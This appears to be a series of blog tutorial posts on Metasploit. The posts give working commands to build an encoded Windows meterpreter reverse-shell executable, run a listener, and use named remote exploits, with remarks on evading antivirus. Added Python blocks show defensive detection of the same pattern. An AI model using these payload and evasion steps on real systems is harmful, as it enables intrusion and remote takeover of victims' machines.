Client Side Attacks

If you are reading this post, you should at least have your own Kali Linux machine with you.
Assuming you have your machine with you, I have not uploaded any reference images.

As already mentioned:

Attacker's IP : 10.4.33.3 [Kali Linux OS]

Victim's IP   : 10.4.33.8 [any Windows OS; use XP or 7 for fewer complications]

The payload we use is windows/meterpreter/reverse_tcp.

We have already seen how to generate a payload, but for now we are using msfvenom to create one, as it was a new addition in the Kali Linux 2 (Sana) release.

Type this command in a root terminal: msfvenom -h

[Screenshot: the msfvenom -h help table]

Looking at the help table above, we can build a payload from these options:

-p : the payload to use

-a : the target architecture

--platform : the victim's operating system

-e : encoder. The author uses it to try to get past weaker or free antivirus products, including Windows Defender. Note that encoders exist mainly to avoid bad characters in the payload; a plain encoded executable is something current antivirus products flag readily.

-f : output format; .bat or .exe for Windows, .elf for Linux, and so on

-o : path where the output file is saved

Now, generating our payload.
I already mentioned that a payload has several variables that must be defined before it is generated.
You can see those variables in Metasploit with the command show options.

Finding Variables

  • Terminal 1

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp   [set, not use: the payload is an option of the handler module that is already selected]

show options

Now you can see the list of variables needed, i.e. LHOST and LPORT.

Keep this terminal open; we will come back to it.

Open a new terminal and run this command to create the payload:

  • Terminal 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=10.4.33.3 LPORT=3456 -e x86/shikata_ga_nai -f exe -o /root/Desktop/payload.exe

Here LHOST is our own IP; find it with the terminal command ifconfig.

LPORT can be any port, but remember which one you used.

After the command completes you will see a payload.exe file on your desktop.

Now you can close this second terminal.

Come back to Terminal 1:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options      [up to here it was already done]

set LHOST 10.4.33.3    [our IP, not the victim's IP]

set LPORT 3456   [this is why we needed to remember the port used before]

set ExitOnSession false   [advanced option, not required, but useful when the attack runs against several machines: the handler keeps listening after the first session opens]

exploit   or   exploit -j

Remember: if you use -j [run as a background job], the meterpreter session is not shown directly; each incoming connection is assigned a session number in order,
the first victim to session 1, the next to session 2, and so on.

So in the same terminal you need the extra command sessions -i 1 to interact with session 1, i.e. to operate the first victim.

For this to happen, payload.exe must be run on the victim's PC. Getting that file onto the victim's PC is a separate task; for now, just to see some results, copy it to the victim's PC yourself and run it.

Terminal 1 should not be closed, as after running all these commands in order it is now the terminal connected to the victim.

It should look like this.

[Screenshot: Terminal 1 with the handler running and a meterpreter session open]

In this image 192.168.222.135 is the attacker and 192.168.222.137 is the victim.

Now you can see the meterpreter prompt. If you can see it, the PC with the IP above is now under your control:
it has been hacked and you can do whatever you want with it.
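From the defender's side, the handler set-up above shows what a reverse_tcp compromise looks like in endpoint telemetry: a freshly launched executable in a user-writable folder (payload.exe on the Desktop here) opening an outbound TCP connection to an unusual port (3456 on this page). The following Python is an added example written for this edit, not code from the blog or from Metasploit. It runs a simple detection rule over constructed records shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect); the folder list, the port allowlist, the 10-second window and the log records themselves are all assumptions made for the example.

```python
"""Added example (not from the blog): spotting the reverse_tcp pattern in telemetry.

The records are constructed in the shape of Sysmon Event ID 1 (ProcessCreate)
and Event ID 3 (NetworkConnect); the folder list, port allowlist and time
window are assumptions for the example.
"""
import re
from datetime import datetime, timedelta

# Folders an ordinary user can write to (assumption for the example).
USER_WRITABLE = re.compile(
    r"\\(Desktop|Downloads|AppData\\Local\\Temp|Temp|Public)\\", re.IGNORECASE)

# Destination ports a newly started process is expected to talk to
# (constructed allowlist; a real deployment tunes this per environment).
EXPECTED_PORTS = {53, 80, 443}

# A stager connects back as soon as it runs, so a connect this soon after
# process start is an extra signal.
WINDOW = timedelta(seconds=10)

# Constructed telemetry.  The attacker address and port (10.4.33.3:3456) are
# the LHOST/LPORT values used on this page; everything else is made up.
EVENTS = [
    {"eid": 1, "time": "2015-10-01T10:00:00", "pid": 4120,
     "image": r"C:\Users\bob\Desktop\payload.exe"},
    {"eid": 3, "time": "2015-10-01T10:00:02", "pid": 4120,
     "image": r"C:\Users\bob\Desktop\payload.exe", "initiated": True,
     "dst_ip": "10.4.33.3", "dst_port": 3456},
    {"eid": 1, "time": "2015-10-01T10:01:00", "pid": 5008,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"eid": 3, "time": "2015-10-01T10:01:01", "pid": 5008,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "initiated": True,
     "dst_ip": "93.184.216.34", "dst_port": 443},
    # Same implant reconnecting minutes later (handler restarted, for instance).
    {"eid": 3, "time": "2015-10-01T10:05:00", "pid": 4120,
     "image": r"C:\Users\bob\Desktop\payload.exe", "initiated": True,
     "dst_ip": "10.4.33.3", "dst_port": 3456},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def find_reverse_shell_candidates(events):
    """Return (pid, image, dst_ip, dst_port, reasons) for suspicious outbound connects.

    A connect is reported when it is outbound, the image lives in a user-writable
    folder AND the destination port is not on the expected list.  If the process
    started within WINDOW before the connect, that is appended as a third reason.
    """
    starts = {e["pid"]: _ts(e["time"]) for e in events if e["eid"] == 1}
    hits = []
    for e in events:
        if e["eid"] != 3 or not e.get("initiated"):
            continue
        reasons = []
        if USER_WRITABLE.search(e["image"]):
            reasons.append("image in user-writable folder")
        if e["dst_port"] not in EXPECTED_PORTS:
            reasons.append("unexpected destination port %d" % e["dst_port"])
        if len(reasons) < 2:
            continue  # require both to keep noise down
        started = starts.get(e["pid"])
        if started is not None and timedelta(0) <= _ts(e["time"]) - started <= WINDOW:
            reasons.append("connect within %ds of process start" % WINDOW.seconds)
        hits.append((e["pid"], e["image"], e["dst_ip"], e["dst_port"], reasons))
    return hits


if __name__ == "__main__":
    for pid, image, ip, port, reasons in find_reverse_shell_candidates(EVENTS):
        print("pid %d %s -> %s:%d: %s" % (pid, image, ip, port, "; ".join(reasons)))
```

On the constructed records the rule reports the two payload.exe connections and ignores the browser. Requiring both the folder and the port condition keeps the rule quiet on ordinary user activity; the process-start window is reported as an extra reason rather than a requirement, because a stager that reconnects later (the third connect above) is still worth seeing.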

But this approach has disadvantages:

  1. We need to deliver the payload [payload.exe] to the victim.
  2. A good antivirus can detect it.

  • Evading Antivirus Detection

You can evade almost any antivirus by creating your payload with Veil-Evasion; there will be a separate blog post for that.
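The -e encoder option and the "a good antivirus can detect this" point above are worth seeing from the scanner's side. The following Python is an added example for this edit, not code from the blog, from Metasploit or from Veil-Evasion. It computes Shannon entropy over fixed-size windows of a constructed file and flags the windows that look like encoded or packed data; it also shows why a constant-key XOR, the simplest kind of "encoding", changes nothing statistically. The sentence, the random buffer, the 512-byte window and the 7.0 threshold are all assumptions made for the example.

```python
"""Added example (not from the blog): an entropy heuristic for encoded payloads.

Ordinary code and text use a narrow, skewed set of byte values; encoded, packed
or encrypted data looks uniform.  Measuring Shannon entropy per window is one
cheap signal scanners and analysts use.  All inputs below are constructed.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a single repeated value, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data: bytes, window: int = 512):
    """Entropy of each fixed-size window, so a small encoded region inside a
    larger, mostly benign file still stands out."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def flag_high_entropy(data: bytes, window: int = 512, threshold: float = 7.0):
    """Offsets of windows whose entropy exceeds the threshold.
    The 7.0 cut-off is an assumption for the example, not a published value."""
    return [i * window for i, h in enumerate(windowed_entropy(data, window))
            if h > threshold]


# Constructed low-entropy region: English text, exactly 1024 bytes.
SENTENCE = (b"Metasploit is a framework for developing and executing exploit code "
            b"against a remote target machine. ")
PLAIN = (SENTENCE * 11)[:1024]

# Constant-key XOR only permutes byte values: the histogram, and therefore the
# entropy, is unchanged.  This is why such "encoding" hides nothing from
# statistical checks.
XOR_CONST = bytes(b ^ 0x41 for b in PLAIN)

# Constructed high-entropy region standing in for an encoder's output
# (deterministic seed so the example is repeatable).
_rng = random.Random(1)
RANDOM_BLOB = bytes(_rng.randrange(256) for _ in range(1024))

# A constructed "file": benign text, then a 1 KiB encoded-looking blob, then text.
SAMPLE_FILE = PLAIN + RANDOM_BLOB + PLAIN


if __name__ == "__main__":
    print("text  : %.2f bits/byte" % shannon_entropy(PLAIN))
    print("xor   : %.2f bits/byte" % shannon_entropy(XOR_CONST))
    print("random: %.2f bits/byte" % shannon_entropy(RANDOM_BLOB))
    print("flagged window offsets:", flag_high_entropy(SAMPLE_FILE))
```

The text scores a little over 4 bits per byte, the XOR'd copy scores exactly the same, and the random region scores close to 8, so only the two windows covering the blob (offsets 1024 and 1536) are flagged. Entropy is a heuristic, not a verdict: compressed images, archives and TLS traffic also score high, which is why real scanners combine it with other signals such as the section layout of the executable and its behaviour when run.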

  • Delivering the Payload

There are some impressive techniques for this, but for now just send the file yourself.

I can mention a few exploits that do not need the payload to be delivered at all:

  1. exploit/windows/dcerpc/ms03_026_dcom [DCERPC vulnerability]
  2. exploit/windows/smb/ms08_067_netapi   [SMB vulnerability]

But these are vulnerability-specific: they only work against hosts that expose the service on the network and are still missing the patch (the fixes date from 2003 and 2008 respectively). Both have a common variable RHOST, which you need to set to the victim's IP: set RHOST 10.4.33.8

There are also exploits that can be embedded in PDF and Excel files, for example

exploit/windows/fileformat/adobe_utilprintf

Which one to use varies with the situation, but my aim is not to leave you with any confusion or misconceptions.

Doubts and suggestions can be commented below.

Metasploit Fundamentals

  • Basic commands of Metasploit
  • Payload types
  • Generating payloads in Metasploit

Basic Commands of Metasploit

In this article we will be talking about the very basics of Metasploit and the Metasploit commands used in the command line interface.

Before learning the Metasploit commands, first make sure your system is up to date. These are the commands to update your OS:

apt-get update

apt-get upgrade

apt-get dist-upgrade

Don't ever try to update Metasploit with the command msfupdate without knowing what you are going to do.

You can open Metasploit with the terminal command msfconsole, which opens with the Metasploit banner as below.

[Screenshot: msfconsole banner]

Now we are in msfconsole, which can be nicknamed the Metasploit terminal or console;
every Metasploit-related command is executed here.
Below is a list of some commands and what they do.

*Every command in this blog is shown in bold italics [ command ]

help

You can further refine your searches by using the built-in keyword system.

set

The ‘set’ command allows you to configure Framework options and parameters for the current module you are working with.

auxiliary

Executing ‘show auxiliary’ will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

exploits

Naturally, ‘show exploits’ will be the command you are most interested in running, since at its core Metasploit is all about exploitation. Run ‘show exploits’ to get a listing of all exploits contained in the framework.

payloads

Running ‘show payloads’ will display all of the different payloads for all platforms available within Metasploit.

use

The ‘use’ command changes your context to a specific module, exposing type-specific commands.

exit

This command takes you back to your root terminal, the default terminal.

These are some basic commands.

Now, how to use an exploit in Metasploit, assuming we know which exploit we want to use. Later we will discuss the most useful and commonly used exploits.

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

This is the exploit; select it with the ‘use’ command, and you will see the msfconsole prompt change to show that a particular exploit has been selected.

Then run the following commands to check what needs to be set, and set the values with the set command:

show targets : shows what type of machine can be attacked with this exploit

show payloads : shows the list of payloads that are valid for the chosen exploit

Now set the required payload with the set command, choosing from the list shown by show payloads.

ex: set payload windows/meterpreter/reverse_tcp          where “windows/meterpreter/reverse_tcp” is one of the payloads listed by show payloads.

show options : after setting the payload, this command shows which variables of the selected exploit and payload must be filled in.

ex: if “x” is a variable that must be set before our payload runs, show options shows the details of “x”; check it and you will not get stuck on an error when executing the exploit.

show advanced : similar to show options but for advanced settings; leaving these unset does not cause an error.

show evasion : similar to show options, for evasion settings.

  • Payload types.

There are many types of payload

  1. Inline (Non Staged)
  2. Staged
  3. Meterpreter
  4. PassiveX
  5. NoNX
  6. Ord
  7. Ipv6
  8. Reflection Dll Injection

It is not necessary to explain all these types now, but if someone is interested you can contact me.

For now we will concentrate on the Meterpreter type of payload.

Meterpreter : short for Meta-Interpreter, an advanced, multi-faceted payload that operates via DLL injection. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required.

  • Generating Payloads in Metasploit

Payloads can be generated in Metasploit with the following commands, starting from your root terminal:

  1. msfconsole : takes us from the root terminal to the Metasploit console
  2. search payload : lists many payloads; pick one suited to your attack. You can learn about the payloads later; for now we are using an arbitrary one.
  3. use payload/windows/shell_bind_tcp : after choosing a payload, select it with the ‘use’ command
  4. generate : produces the raw payload code; it can be output in many other forms using the options below
  5. generate -h lists the options available to generate, in the same way -h does for other commands

You can also generate payloads in other ways; for example you can use the Social-Engineer Toolkit (the command for that is setoolkit in a root terminal), but the way we generate them here is a bit different.

There are many other external tools too,

like Veil-Evasion, which is one of the best ways to create a payload that antivirus does not detect; we will look at these in detail later.

I guess by now you are able to create your own payload given its name. Remember that some payloads need their variables filled in, so never forget to run show options after selecting a payload. The payload we generated above has no predefined variables, so I did not check it.

After a lot of practice you will be able to pick a payload to suit the situation, and you will know its variables too.

My contact details.
gmail: kaparapu.akhilnaidu@gmil.com

facebook: https://www.facebook.com/kaparapu.akhilnaidu

For any doubts and suggestions comment below.

Network and Security

This blog is to guide you in the right direction for your future in a network and security related career.
I got many personal emails asking me to write a blog after my YouTube channel was blocked. At that time it was a bit more work for me to write a blog without any preparation, so I started exploring more and more on cyber security; I used to attend a lot of workshops conducted all over India, and I myself conducted a series of workshops at IIT Guwahati.

For now I can start my own series of lectures through this blog.
In this lecture series we will be using Kali Linux as our operating system [attacker machine] and Windows as the victim's operating system.

Our First Lecture is on Metasploit

This post will be updated regularly with direct links within the index itself.

Doubts and suggestions can be commented below.